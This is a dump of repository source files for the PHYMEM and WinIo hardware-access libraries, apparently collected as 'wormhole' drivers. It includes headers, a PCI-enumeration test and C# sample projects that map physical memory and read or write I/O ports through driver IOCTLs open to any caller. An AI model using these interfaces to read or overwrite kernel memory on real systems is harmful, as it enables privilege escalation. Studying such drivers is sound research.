/source/WormholeDrivers/PHYMEM/PhyMem/pmdll/Release/pmdll.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/source/WormholeDrivers/PHYMEM/PhyMem/pmdll/Release/pmdll.lib -------------------------------------------------------------------------------- /source/WormholeDrivers/PHYMEM/PhyMem/pmdll/phymem.h: -------------------------------------------------------------------------------- 1 | #ifndef __PHYMEM_H 2 | #define __PHYMEM_H 3 | 4 | #define FILE_DEVICE_PHYMEM 0x8000 5 | 6 | #define IOCTL_PHYMEM_MAP \ 7 | CTL_CODE(FILE_DEVICE_PHYMEM, 0x800,\ 8 | METHOD_BUFFERED, FILE_ANY_ACCESS) 9 | 10 | #define IOCTL_PHYMEM_UNMAP \ 11 | CTL_CODE(FILE_DEVICE_PHYMEM, 0x801,\ 12 | METHOD_BUFFERED, FILE_ANY_ACCESS) 13 | 14 | #define IOCTL_PHYMEM_GETPORT \ 15 | CTL_CODE(FILE_DEVICE_PHYMEM, 0x802,\ 16 | METHOD_BUFFERED, FILE_ANY_ACCESS) 17 | 18 | #define IOCTL_PHYMEM_SETPORT \ 19 | CTL_CODE(FILE_DEVICE_PHYMEM, 0x803,\ 20 | METHOD_BUFFERED, FILE_ANY_ACCESS) 21 | 22 | #define IOCTL_PHYMEM_GETPCI \ 23 | CTL_CODE(FILE_DEVICE_PHYMEM, 0x804,\ 24 | METHOD_OUT_DIRECT, FILE_ANY_ACCESS) 25 | 26 | #define IOCTL_PHYMEM_SETPCI \ 27 | CTL_CODE(FILE_DEVICE_PHYMEM, 0x805,\ 28 | METHOD_OUT_DIRECT, FILE_ANY_ACCESS) 29 | 30 | typedef struct tagPHYMEM_MEM 31 | { 32 | PVOID pvAddr; //physical addr when mapping, virtual addr when unmapping 33 | ULONG dwSize; //memory size to map or unmap 34 | } PHYMEM_MEM, *PPHYMEM_MEM; 35 | 36 | typedef struct tagPHYMEM_PORT 37 | { 38 | ULONG dwPort; //port number: 0-0xFFFF 39 | ULONG dwSize; //must be 1, 2, 4 40 | ULONG dwValue; //new value to set 41 | } PHYMEM_PORT, *PPHYMEM_PORT; 42 | 43 | typedef struct tagPHYMEM_PCI 44 | { 45 | ULONG dwBusNum; //bus number: 0-255 46 | ULONG dwDevNum; //device number: 0-31 47 | ULONG dwFuncNum; //function number: 0-7 48 | ULONG dwRegOff; //register offset: 0-255 49 | ULONG dwBytes; //bytes to read or write 50 | } PHYMEM_PCI, *PPHYMEM_PCI; 51 | 52 | #endif //__PHYMEM_H 53 | -------------------------------------------------------------------------------- /source/WormholeDrivers/PHYMEM/PhyMem/pmdll/pmdll.dsw: -------------------------------------------------------------------------------- 1 | Microsoft Developer Studio Workspace File, Format Version 6.00 2 | # WARNING: DO NOT EDIT OR DELETE THIS WORKSPACE FILE! 3 | 4 | ############################################################################### 5 | 6 | Project: "pmdll"=.\pmdll.dsp - Package Owner=<4> 7 | 8 | Package=<5> 9 | {{{ 10 | }}} 11 | 12 | Package=<4> 13 | {{{ 14 | }}} 15 | 16 | ############################################################################### 17 | 18 | Global: 19 | 20 | Package=<5> 21 | {{{ 22 | }}} 23 | 24 | Package=<3> 25 | {{{ 26 | }}} 27 | 28 | ############################################################################### 29 | 30 | -------------------------------------------------------------------------------- /source/WormholeDrivers/PHYMEM/PhyMem/pmdll/pmdll.h: -------------------------------------------------------------------------------- 1 | #ifndef __PMDLL_H 2 | #define __PMDLL_H 3 | 4 | #ifdef PMDLL_EXPORTS 5 | #define DLL_DECLARE __declspec(dllexport) 6 | #else 7 | #define DLL_DECLARE __declspec(dllimport) 8 | #endif 9 | 10 | #ifdef __cplusplus 11 | extern "C" 12 | { 13 | #endif 14 | 15 | //driver initialize 16 | DLL_DECLARE BOOL LoadPhyMemDriver(); 17 | DLL_DECLARE VOID UnloadPhyMemDriver(); 18 | 19 | //map physical memory to user space 20 | DLL_DECLARE PVOID MapPhyMem(DWORD phyAddr, DWORD memSize); 21 | DLL_DECLARE VOID UnmapPhyMem(PVOID pVirAddr, DWORD memSize); 22 | 23 | //access port 24 | DLL_DECLARE BYTE ReadPortByte(WORD portAddr); 25 | DLL_DECLARE WORD ReadPortWord(WORD portAddr); 26 | DLL_DECLARE DWORD ReadPortLong(WORD portAddr); 27 | DLL_DECLARE VOID WritePortByte(WORD portAddr, BYTE portValue); 28 | DLL_DECLARE VOID WritePortWord(WORD portAddr, WORD portValue); 29 | DLL_DECLARE VOID WritePortLong(WORD portAddr, DWORD portValue); 30 | 31 | //access PCI bus 32 | DLL_DECLARE BOOL ReadPCI(DWORD busNum, DWORD devNum, DWORD funcNum, 33 | DWORD regOff, DWORD bytes, PVOID pValue); 34 | DLL_DECLARE BOOL WritePCI(DWORD busNum, DWORD devNum, DWORD funcNum, 35 | DWORD regOff, DWORD bytes, PVOID pValue); 36 | 37 | #ifdef __cplusplus 38 | } 39 | #endif 40 | 41 | #endif //__PMDLL_H -------------------------------------------------------------------------------- /source/WormholeDrivers/PHYMEM/PhyMem/test/pmdll.h: -------------------------------------------------------------------------------- 1 | #ifndef __PMDLL_H 2 | #define __PMDLL_H 3 | 4 | #ifdef PMDLL_EXPORTS 5 | #define DLL_DECLARE __declspec(dllexport) 6 | #else 7 | #define DLL_DECLARE __declspec(dllimport) 8 | #endif 9 | 10 | #ifdef __cplusplus 11 | extern "C" 12 | { 13 | #endif 14 | 15 | //driver initialize 16 | DLL_DECLARE BOOL LoadPhyMemDriver(); 17 | DLL_DECLARE VOID UnloadPhyMemDriver(); 18 | 19 | //map physical memory to user space 20 | DLL_DECLARE PVOID MapPhyMem(DWORD phyAddr, DWORD memSize); 21 | DLL_DECLARE VOID UnmapPhyMem(PVOID pVirAddr, DWORD memSize); 22 | 23 | //access port 24 | DLL_DECLARE BYTE ReadPortByte(WORD portAddr); 25 | DLL_DECLARE WORD ReadPortWord(WORD portAddr); 26 | DLL_DECLARE DWORD ReadPortLong(WORD portAddr); 27 | DLL_DECLARE VOID WritePortByte(WORD portAddr, BYTE portValue); 28 | DLL_DECLARE VOID WritePortWord(WORD portAddr, WORD portValue); 29 | DLL_DECLARE VOID WritePortLong(WORD portAddr, DWORD portValue); 30 | 31 | //access PCI bus 32 | DLL_DECLARE BOOL ReadPCI(DWORD busNum, DWORD devNum, DWORD funcNum, 33 | DWORD regOff, DWORD bytes, PVOID pValue); 34 | DLL_DECLARE BOOL WritePCI(DWORD busNum, DWORD devNum, DWORD funcNum, 35 | DWORD regOff, DWORD bytes, PVOID pValue); 36 | 37 | #ifdef __cplusplus 38 | } 39 | #endif 40 | 41 | #endif //__PMDLL_H -------------------------------------------------------------------------------- /source/WormholeDrivers/PHYMEM/PhyMem/test/pmdll.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/source/WormholeDrivers/PHYMEM/PhyMem/test/pmdll.lib -------------------------------------------------------------------------------- /source/WormholeDrivers/PHYMEM/PhyMem/test/test.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include "pmdll.h" 5 | 6 | int main() 7 | { 8 | BOOL b=LoadPhyMemDriver(); 9 | 10 | if (b==FALSE) 11 | { 12 | printf("load phymem.sys failed\n"); 13 | exit(-1); 14 | } 15 | 16 | char *va=(char*)MapPhyMem(0xF7020, 20); 17 | printf("mapped virtual address = 0x%08x\n", va); 18 | UnmapPhyMem(va, 20); 19 | 20 | /* 21 | DWORD d=ReadPortByte(0x379); 22 | WritePortLong(0x378, 10); 23 | d=ReadPortLong(0x378); 24 | */ 25 | 26 | //enumerate PCI bus 27 | for (int bus=0; bus<=255; bus++) 28 | { 29 | for (int dev=0; dev<=31; dev++) 30 | { 31 | for (int func=0; func<=7; func++) 32 | { 33 | DWORD dev_ven; 34 | if (ReadPCI(bus, dev, func, 0, 4, &dev_ven)) 35 | { 36 | if (LOWORD(dev_ven)!=0xFFFF) 37 | printf("Bus %d, Device %d, Function %d, Vendor ID 0x%x, Device ID 0x%x\n", 38 | bus, dev, func, LOWORD(dev_ven), HIWORD(dev_ven)); 39 | } 40 | } 41 | } 42 | } 43 | 44 | printf("end"); 45 | getchar(); 46 | 47 | UnloadPhyMemDriver(); 48 | return 0; 49 | } 50 | -------------------------------------------------------------------------------- /source/WormholeDrivers/PHYMEM/PhyMem/test/test.dsw: -------------------------------------------------------------------------------- 1 | Microsoft Developer Studio Workspace File, Format Version 6.00 2 | # WARNING: DO NOT EDIT OR DELETE THIS WORKSPACE FILE! 3 | 4 | ############################################################################### 5 | 6 | Project: "test"=.\test.dsp - Package Owner=<4> 7 | 8 | Package=<5> 9 | {{{ 10 | }}} 11 | 12 | Package=<4> 13 | {{{ 14 | }}} 15 | 16 | ############################################################################### 17 | 18 | Global: 19 | 20 | Package=<5> 21 | {{{ 22 | }}} 23 | 24 | Package=<3> 25 | {{{ 26 | }}} 27 | 28 | ############################################################################### 29 | 30 | -------------------------------------------------------------------------------- /source/WormholeDrivers/WINIO/.gitignore: -------------------------------------------------------------------------------- 1 | # Prerequisites 2 | *.d 3 | 4 | # Compiled Object files 5 | *.slo 6 | *.lo 7 | *.o 8 | *.obj 9 | 10 | # Precompiled Headers 11 | *.gch 12 | *.pch 13 | 14 | # Compiled Dynamic libraries 15 | *.so 16 | *.dylib 17 | *.dll 18 | 19 | # Fortran module files 20 | *.mod 21 | *.smod 22 | 23 | # Compiled Static libraries 24 | *.lai 25 | *.la 26 | *.a 27 | *.lib 28 | 29 | # Executables 30 | *.exe 31 | *.out 32 | *.app 33 | 34 | # Ignore vscode files 35 | .vscode -------------------------------------------------------------------------------- /source/WormholeDrivers/WINIO/Samples/DumpPhys/DumpPhys.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 10.00 3 | # Visual Studio 2008 4 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "DumpPhys", "DumpPhys\DumpPhys.csproj", "{1103585F-D85D-4599-8858-C0D3E9D7419F}" 5 | EndProject 6 | Global 7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 8 | Debug|Any CPU = Debug|Any CPU 9 | Debug|x86 = Debug|x86 10 | Release|Any CPU = Release|Any CPU 11 | Release|x86 = Release|x86 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {1103585F-D85D-4599-8858-C0D3E9D7419F}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {1103585F-D85D-4599-8858-C0D3E9D7419F}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {1103585F-D85D-4599-8858-C0D3E9D7419F}.Debug|x86.ActiveCfg = Debug|x86 17 | {1103585F-D85D-4599-8858-C0D3E9D7419F}.Debug|x86.Build.0 = Debug|x86 18 | {1103585F-D85D-4599-8858-C0D3E9D7419F}.Release|Any CPU.ActiveCfg = Release|Any CPU 19 | {1103585F-D85D-4599-8858-C0D3E9D7419F}.Release|Any CPU.Build.0 = Release|Any CPU 20 | {1103585F-D85D-4599-8858-C0D3E9D7419F}.Release|x86.ActiveCfg = Release|x86 21 | {1103585F-D85D-4599-8858-C0D3E9D7419F}.Release|x86.Build.0 = Release|x86 22 | EndGlobalSection 23 | GlobalSection(SolutionProperties) = preSolution 24 | HideSolutionNode = FALSE 25 | EndGlobalSection 26 | EndGlobal 27 | -------------------------------------------------------------------------------- /source/WormholeDrivers/WINIO/Samples/DumpPhys/DumpPhys.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/source/WormholeDrivers/WINIO/Samples/DumpPhys/DumpPhys.suo -------------------------------------------------------------------------------- /source/WormholeDrivers/WINIO/Samples/DumpPhys/DumpPhys/DumpPhys.manifest: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | -------------------------------------------------------------------------------- /source/WormholeDrivers/WINIO/Samples/DumpPhys/DumpPhys/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Windows.Forms; 4 | 5 | namespace DumpPhys 6 | { 7 | static class Program 8 | { 9 | /// 10 | /// The main entry point for the application. 11 | /// 12 | [STAThread] 13 | static void Main() 14 | { 15 | Application.EnableVisualStyles(); 16 | Application.SetCompatibleTextRenderingDefault(false); 17 | Application.Run(new Form1()); 18 | } 19 | } 20 | } -------------------------------------------------------------------------------- /source/WormholeDrivers/WINIO/Samples/DumpPhys/DumpPhys/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("DumpPhys")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("www.internals.com")] 12 | [assembly: AssemblyProduct("DumpPhys")] 13 | [assembly: AssemblyCopyright("Copyright © Yariv Kaplan 2010")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("16fd1afb-d769-4e14-89ba-eef3670c272b")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | [assembly: AssemblyVersion("1.0.0.0")] 33 | [assembly: AssemblyFileVersion("1.0.0.0")] 34 | -------------------------------------------------------------------------------- /source/WormholeDrivers/WINIO/Samples/DumpPhys/DumpPhys/Properties/Settings.Designer.cs: -------------------------------------------------------------------------------- 1 | //------------------------------------------------------------------------------ 2 | // 3 | // This code was generated by a tool. 4 | // Runtime Version:2.0.50727.4927 5 | // 6 | // Changes to this file may cause incorrect behavior and will be lost if 7 | // the code is regenerated. 8 | // 9 | //------------------------------------------------------------------------------ 10 | 11 | namespace DumpPhys.Properties { 12 | 13 | 14 | [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()] 15 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "9.0.0.0")] 16 | internal sealed partial class Settings : global::System.Configuration.ApplicationSettingsBase { 17 | 18 | private static Settings defaultInstance = ((Settings)(global::System.Configuration.ApplicationSettingsBase.Synchronized(new Settings()))); 19 | 20 | public static Settings Default { 21 | get { 22 | return defaultInstance; 23 | } 24 | } 25 | } 26 | } 27 | -------------------------------------------------------------------------------- /source/WormholeDrivers/WINIO/Samples/DumpPhys/DumpPhys/Properties/Settings.settings: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /source/WormholeDrivers/WINIO/Samples/DumpPort/DumpPort.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 10.00 3 | # Visual Studio 2008 4 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "DumpPort", "DumpPort\DumpPort.csproj", "{8E2C04F3-BDE2-49A4-8736-DE12944D5DDF}" 5 | EndProject 6 | Global 7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 8 | Debug|Any CPU = Debug|Any CPU 9 | Debug|x86 = Debug|x86 10 | Release|Any CPU = Release|Any CPU 11 | Release|x86 = Release|x86 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {8E2C04F3-BDE2-49A4-8736-DE12944D5DDF}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {8E2C04F3-BDE2-49A4-8736-DE12944D5DDF}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {8E2C04F3-BDE2-49A4-8736-DE12944D5DDF}.Debug|x86.ActiveCfg = Debug|x86 17 | {8E2C04F3-BDE2-49A4-8736-DE12944D5DDF}.Debug|x86.Build.0 = Debug|x86 18 | {8E2C04F3-BDE2-49A4-8736-DE12944D5DDF}.Release|Any CPU.ActiveCfg = Release|Any CPU 19 | {8E2C04F3-BDE2-49A4-8736-DE12944D5DDF}.Release|Any CPU.Build.0 = Release|Any CPU 20 | {8E2C04F3-BDE2-49A4-8736-DE12944D5DDF}.Release|x86.ActiveCfg = Release|x86 21 | {8E2C04F3-BDE2-49A4-8736-DE12944D5DDF}.Release|x86.Build.0 = Release|x86 22 | EndGlobalSection 23 | GlobalSection(SolutionProperties) = preSolution 24 | HideSolutionNode = FALSE 25 | EndGlobalSection 26 | EndGlobal 27 | -------------------------------------------------------------------------------- /source/WormholeDrivers/WINIO/Samples/DumpPort/DumpPort.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/source/WormholeDrivers/WINIO/Samples/DumpPort/DumpPort.suo -------------------------------------------------------------------------------- /source/WormholeDrivers/WINIO/Samples/DumpPort/DumpPort/DumpPort.manifest: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | -------------------------------------------------------------------------------- /source/WormholeDrivers/WINIO/Samples/DumpPort/DumpPort/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Windows.Forms; 4 | 5 | namespace DumpPort 6 | { 7 | static class Program 8 | { 9 | /// 10 | /// The main entry point for the application. 11 | /// 12 | [STAThread] 13 | static void Main() 14 | { 15 | Application.EnableVisualStyles(); 16 | Application.SetCompatibleTextRenderingDefault(false); 17 | Application.Run(new Form1()); 18 | } 19 | } 20 | } -------------------------------------------------------------------------------- /source/WormholeDrivers/WINIO/Samples/DumpPort/DumpPort/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("DumpPort")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("www.internals.com")] 12 | [assembly: AssemblyProduct("DumpPort")] 13 | [assembly: AssemblyCopyright("Copyright © Yariv Kaplan 2010")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("e4aa10c8-3c4e-4ea5-8461-4da84bf602f5")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | [assembly: AssemblyVersion("1.0.0.0")] 33 | [assembly: AssemblyFileVersion("1.0.0.0")] 34 | -------------------------------------------------------------------------------- /source/WormholeDrivers/WINIO/Samples/DumpPort/DumpPort/Properties/Settings.Designer.cs: -------------------------------------------------------------------------------- 1 | //------------------------------------------------------------------------------ 2 | // 3 | // This code was generated by a tool. 4 | // Runtime Version:2.0.50727.4927 5 | // 6 | // Changes to this file may cause incorrect behavior and will be lost if 7 | // the code is regenerated. 8 | // 9 | //------------------------------------------------------------------------------ 10 | 11 | namespace DumpPort.Properties { 12 | 13 | 14 | [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()] 15 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "9.0.0.0")] 16 | internal sealed partial class Settings : global::System.Configuration.ApplicationSettingsBase { 17 | 18 | private static Settings defaultInstance = ((Settings)(global::System.Configuration.ApplicationSettingsBase.Synchronized(new Settings()))); 19 | 20 | public static Settings Default { 21 | get { 22 | return defaultInstance; 23 | } 24 | } 25 | } 26 | } 27 | -------------------------------------------------------------------------------- /source/WormholeDrivers/WINIO/Samples/DumpPort/DumpPort/Properties/Settings.settings: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /source/WormholeDrivers/WINIO/Source/Dll/Phys32.cpp: -------------------------------------------------------------------------------- 1 | // ---------------------------------------------------- // 2 | // WinIo v3.0 // 3 | // Direct Hardware Access Under Windows // 4 | // Copyright 1998-2010 Yariv Kaplan // 5 | // http://www.internals.com // 6 | // ---------------------------------------------------- // 7 | 8 | #include 9 | #include 10 | #include "phys32.h" 11 | #include "..\drv\winio_nt.h" 12 | #include "winio.h" 13 | 14 | 15 | PBYTE _stdcall MapPhysToLin(tagPhysStruct &PhysStruct) 16 | { 17 | PBYTE pbLinAddr = NULL; 18 | DWORD dwBytesReturned; 19 | 20 | if (!IsWinIoInitialized) 21 | return false; 22 | 23 | if (!DeviceIoControl(hDriver, IOCTL_WINIO_MAPPHYSTOLIN, &PhysStruct, 24 | sizeof(tagPhysStruct), &PhysStruct, sizeof(tagPhysStruct), 25 | &dwBytesReturned, NULL)) 26 | { 27 | return NULL; 28 | } 29 | 30 | return (PBYTE)PhysStruct.pvPhysMemLin; 31 | } 32 | 33 | 34 | bool _stdcall UnmapPhysicalMemory(tagPhysStruct &PhysStruct) 35 | { 36 | DWORD dwBytesReturned; 37 | 38 | if (!IsWinIoInitialized) 39 | { 40 | return false; 41 | } 42 | 43 | if (!DeviceIoControl(hDriver, IOCTL_WINIO_UNMAPPHYSADDR, &PhysStruct, 44 | sizeof(tagPhysStruct), NULL, 0, &dwBytesReturned, NULL)) 45 | { 46 | return false; 47 | } 48 | 49 | return true; 50 | } 51 | 52 | // Support functions 53 | 54 | bool _stdcall GetPhysLong(PBYTE pbPhysAddr, PDWORD pdwPhysVal) 55 | { 56 | PDWORD pdwLinAddr; 57 | tagPhysStruct PhysStruct; 58 | 59 | if (!IsWinIoInitialized) 60 | return false; 61 | 62 | if (g_Is64BitOS) 63 | { 64 | PhysStruct.pvPhysAddress = (DWORD64)pbPhysAddr; 65 | } 66 | else 67 | { 68 | // Avoid sign extension issues 69 | PhysStruct.pvPhysAddress = (DWORD64)(DWORD32)pbPhysAddr; 70 | } 71 | 72 | PhysStruct.dwPhysMemSizeInBytes = 4; 73 | 74 | pdwLinAddr = (PDWORD)MapPhysToLin(PhysStruct); 75 | 76 | if (pdwLinAddr == NULL) 77 | return false; 78 | 79 | *pdwPhysVal = *pdwLinAddr; 80 | 81 | UnmapPhysicalMemory(PhysStruct); 82 | 83 | return true; 84 | } 85 | 86 | 87 | bool _stdcall SetPhysLong(PBYTE pbPhysAddr, DWORD dwPhysVal) 88 | { 89 | PDWORD pdwLinAddr; 90 | tagPhysStruct PhysStruct; 91 | 92 | if (!IsWinIoInitialized) 93 | return false; 94 | 95 | if (g_Is64BitOS) 96 | { 97 | PhysStruct.pvPhysAddress = (DWORD64)pbPhysAddr; 98 | } 99 | else 100 | { 101 | // Avoid sign extension issues 102 | PhysStruct.pvPhysAddress = (DWORD64)(DWORD32)pbPhysAddr; 103 | } 104 | 105 | PhysStruct.dwPhysMemSizeInBytes = 4; 106 | 107 | pdwLinAddr = (PDWORD)MapPhysToLin(PhysStruct); 108 | 109 | if (pdwLinAddr == NULL) 110 | return false; 111 | 112 | *pdwLinAddr = dwPhysVal; 113 | 114 | UnmapPhysicalMemory(PhysStruct); 115 | 116 | return true; 117 | } 118 | -------------------------------------------------------------------------------- /source/WormholeDrivers/WINIO/Source/Dll/Phys32.h: -------------------------------------------------------------------------------- 1 | #ifndef PHYS32_H 2 | #define PHYS32_H 3 | 4 | extern DWORD (WINAPI *VxDCall)(DWORD Service, DWORD EAX_Reg, DWORD ECX_Reg); 5 | 6 | #endif -------------------------------------------------------------------------------- /source/WormholeDrivers/WINIO/Source/Dll/Port32.h: -------------------------------------------------------------------------------- 1 | #ifndef PORT32_H 2 | #define PORT32_H 3 | 4 | #pragma pack(1) 5 | 6 | struct GDT_DESCRIPTOR 7 | { 8 | WORD Limit_0_15; 9 | WORD Base_0_15; 10 | BYTE Base_16_23; 11 | BYTE Type : 4; 12 | BYTE System : 1; 13 | BYTE DPL : 2; 14 | BYTE Present : 1; 15 | BYTE Limit_16_19 : 4; 16 | BYTE Available : 1; 17 | BYTE Reserved : 1; 18 | BYTE D_B : 1; 19 | BYTE Granularity : 1; 20 | BYTE Base_24_31; 21 | }; 22 | 23 | struct CALLGATE_DESCRIPTOR 24 | { 25 | WORD Offset_0_15; 26 | WORD Selector; 27 | WORD ParamCount : 5; 28 | WORD Unused : 3; 29 | WORD Type : 4; 30 | WORD System : 1; 31 | WORD DPL : 2; 32 | WORD Present : 1; 33 | WORD Offset_16_31; 34 | }; 35 | 36 | struct GDTR 37 | { 38 | WORD wGDTLimit; 39 | DWORD dwGDTBase; 40 | }; 41 | 42 | #pragma pack() 43 | 44 | #endif -------------------------------------------------------------------------------- /source/WormholeDrivers/WINIO/Source/Dll/WinIo.aps: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/source/WormholeDrivers/WINIO/Source/Dll/WinIo.aps -------------------------------------------------------------------------------- /source/WormholeDrivers/WINIO/Source/Dll/WinIo.def: -------------------------------------------------------------------------------- 1 | EXPORTS 2 | InitializeWinIo 3 | ShutdownWinIo 4 | MapPhysToLin 5 | UnmapPhysicalMemory 6 | GetPhysLong 7 | SetPhysLong 8 | GetPortVal 9 | SetPortVal 10 | InstallWinIoDriver 11 | RemoveWinIoDriver 12 | -------------------------------------------------------------------------------- /source/WormholeDrivers/WINIO/Source/Dll/WinIo.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/source/WormholeDrivers/WINIO/Source/Dll/WinIo.rc -------------------------------------------------------------------------------- /source/WormholeDrivers/WINIO/Source/Dll/WinIo.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 10.00 3 | # Visual Studio 2008 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "WinIo", "WinIo.vcproj", "{DE9A75D4-D640-41B8-893B-A384FAF00738}" 5 | EndProject 6 | Global 7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 8 | Debug|Win32 = Debug|Win32 9 | Debug|x64 = Debug|x64 10 | Release|Win32 = Release|Win32 11 | Release|x64 = Release|x64 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {DE9A75D4-D640-41B8-893B-A384FAF00738}.Debug|Win32.ActiveCfg = Debug|Win32 15 | {DE9A75D4-D640-41B8-893B-A384FAF00738}.Debug|Win32.Build.0 = Debug|Win32 16 | {DE9A75D4-D640-41B8-893B-A384FAF00738}.Debug|x64.ActiveCfg = Debug|x64 17 | {DE9A75D4-D640-41B8-893B-A384FAF00738}.Debug|x64.Build.0 = Debug|x64 18 | {DE9A75D4-D640-41B8-893B-A384FAF00738}.Release|Win32.ActiveCfg = Release|Win32 19 | {DE9A75D4-D640-41B8-893B-A384FAF00738}.Release|Win32.Build.0 = Release|Win32 20 | {DE9A75D4-D640-41B8-893B-A384FAF00738}.Release|x64.ActiveCfg = Release|x64 21 | {DE9A75D4-D640-41B8-893B-A384FAF00738}.Release|x64.Build.0 = Release|x64 22 | EndGlobalSection 23 | GlobalSection(SolutionProperties) = preSolution 24 | HideSolutionNode = FALSE 25 | EndGlobalSection 26 | EndGlobal 27 | -------------------------------------------------------------------------------- /source/WormholeDrivers/WINIO/Source/Dll/WinIo.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/source/WormholeDrivers/WINIO/Source/Dll/WinIo.suo -------------------------------------------------------------------------------- /source/WormholeDrivers/WINIO/Source/Dll/resource.h: -------------------------------------------------------------------------------- 1 | //{{NO_DEPENDENCIES}} 2 | // Microsoft Developer Studio generated include file. 3 | // Used by WinIo.rc 4 | // 5 | 6 | // Next default values for new objects 7 | // 8 | #ifdef APSTUDIO_INVOKED 9 | #ifndef APSTUDIO_READONLY_SYMBOLS 10 | #define _APS_NEXT_RESOURCE_VALUE 101 11 | #define _APS_NEXT_COMMAND_VALUE 40001 12 | #define _APS_NEXT_CONTROL_VALUE 1000 13 | #define _APS_NEXT_SYMED_VALUE 101 14 | #endif 15 | #endif 16 | -------------------------------------------------------------------------------- /source/WormholeDrivers/WINIO/Source/Dll/winio.h: -------------------------------------------------------------------------------- 1 | #ifndef WINIO_H 2 | #define WINIO_H 3 | 4 | #include "..\drv\winio_nt.h" 5 | 6 | #ifndef WINIO_DLL 7 | #define WINIO_API _declspec(dllimport) 8 | #else 9 | #define WINIO_API 10 | #endif 11 | 12 | extern "C" 13 | { 14 | WINIO_API bool _stdcall InitializeWinIo(); 15 | WINIO_API void _stdcall ShutdownWinIo(); 16 | WINIO_API PBYTE _stdcall MapPhysToLin(tagPhysStruct &PhysStruct); 17 | WINIO_API bool _stdcall UnmapPhysicalMemory(tagPhysStruct &PhysStruct); 18 | WINIO_API bool _stdcall GetPhysLong(PBYTE pbPhysAddr, PDWORD pdwPhysVal); 19 | WINIO_API bool _stdcall SetPhysLong(PBYTE pbPhysAddr, DWORD dwPhysVal); 20 | 